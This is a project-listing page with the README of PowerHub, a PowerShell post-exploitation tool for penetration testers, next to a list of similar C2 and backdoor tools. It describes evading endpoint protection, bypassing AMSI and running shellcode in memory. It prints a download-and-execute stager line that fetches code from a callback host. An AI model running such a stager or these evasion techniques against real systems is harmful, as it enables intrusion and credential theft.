All Projects → AdrianVollmer → Powerhub

AdrianVollmer / Powerhub

Licence: mit
A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting

Programming Languages

python
139335 projects - #7 most used programming language
powershell
5483 projects

Projects that are alternatives of or similar to Powerhub

Hacker Roadmap
📌 Your beginner pen-testing start guide. A guide for amateur pen testers and a collection of hacking tools, resources and references to practice ethical hacking and web security.
Stars: ✭ 7,752 (+1698.61%)
Mutual labels:  pentest, post-exploitation
Sifter
Sifter aims to be a fully loaded Op Centre for Pentesters
Stars: ✭ 403 (-6.5%)
Mutual labels:  pentest, post-exploitation
Poet
[unmaintained] Post-exploitation tool
Stars: ✭ 184 (-57.31%)
Mutual labels:  pentest, post-exploitation
Blackmamba
C2/post-exploitation framework
Stars: ✭ 544 (+26.22%)
Mutual labels:  pentest, post-exploitation
Bifrost
Bifrost C2. Open-source post-exploitation using Discord API
Stars: ✭ 37 (-91.42%)
Mutual labels:  post-exploitation, pentest
Blueshell
红蓝对抗跨平台远控工具
Stars: ✭ 379 (-12.06%)
Mutual labels:  pentest
K8tools
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)
Stars: ✭ 4,173 (+868.21%)
Mutual labels:  pentest
Open Redirect Payloads
Open Redirect Payloads
Stars: ✭ 361 (-16.24%)
Mutual labels:  pentest
Objection
📱 objection - runtime mobile exploration
Stars: ✭ 4,404 (+921.81%)
Mutual labels:  pentest
Covertutils
A framework for Backdoor development!
Stars: ✭ 424 (-1.62%)
Mutual labels:  post-exploitation
Pwndoc
Pentest Report Generator
Stars: ✭ 417 (-3.25%)
Mutual labels:  pentest
Gdog
A fully featured Windows backdoor that uses Gmail as a C&C server
Stars: ✭ 399 (-7.42%)
Mutual labels:  pentest
Slackor
A Golang implant that uses Slack as a command and control server
Stars: ✭ 392 (-9.05%)
Mutual labels:  pentest
Iox
Tool for port forwarding & intranet proxy
Stars: ✭ 411 (-4.64%)
Mutual labels:  pentest
Emp3r0r
linux post-exploitation framework made by linux user
Stars: ✭ 419 (-2.78%)
Mutual labels:  post-exploitation
Webshell Sniper
🔨 Manage your website via terminal
Stars: ✭ 359 (-16.71%)
Mutual labels:  pentest
Linux Kernel Exploits
linux-kernel-exploits Linux平台提权漏洞集合
Stars: ✭ 4,203 (+875.17%)
Mutual labels:  pentest
Torat
ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication
Stars: ✭ 415 (-3.71%)
Mutual labels:  post-exploitation
Ss7maper
SS7 MAP (pen-)testing toolkit. DISCONTINUED REPO, please use: https://github.com/0xc0decafe/ss7MAPer/
Stars: ✭ 394 (-8.58%)
Mutual labels:  pentest
Ad Pentest Notes
用于记录内网渗透(域渗透)学习 :-)
Stars: ✭ 390 (-9.51%)
Mutual labels:  pentest

PowerHub

PowerHub is a convenient post exploitation tool for PowerShell which aids a pentester in transferring data, in particular code which may get flagged by endpoint protection. Check out the Wiki! Features:

  • Fileless
  • Stateless
  • Cert pinning
  • String "obfuscation" by RC4 encryption
  • Choose your AMSI Bypass

PowerHub Webapp

During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc. PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8080/0?t=http&f=r&a=reflection');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
PS C:\Users\avollmer> lhm powerview
Name                                Type N  Loaded
----                                ---- -  ------
ps1/PowerSploit/Recon/PowerView.ps1 ps1  29   True
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json

Installation

PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment.

If you do want to install PowerHub, you should do pip3 install --user ..

Python2 is not supported.

For building the payloads, you need the MinGW GCC and Mono C# compilers. On Debian-like systems, you can install them with apt-get install mono-mcs gcc-mingw-w64-x86-64 gcc-mingw-w64-i686.

venv

venv can be installed on Debian-like systems by apt install python3-venv.

Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install --user . to install the depencendies inside the virtual environment.

pipenv

Alternatively, you can use pipenv. pipenv can be installed on Debian-like systems by apt install pipenv.

Run pipenv install once in the PowerHub directory, then pipenv shell to activate the virtual environment.

Usage

PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication. The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.

Read ./powerhub.py --help and the Wiki for details.

Credits

PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10, p3nt4, @SkelSec. And of course, it would be nothing without @harmj0y, @mattifestation and the many other contributors to PowerSploit.

Thanks!

Author

Adrian Vollmer, 2018-2020

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].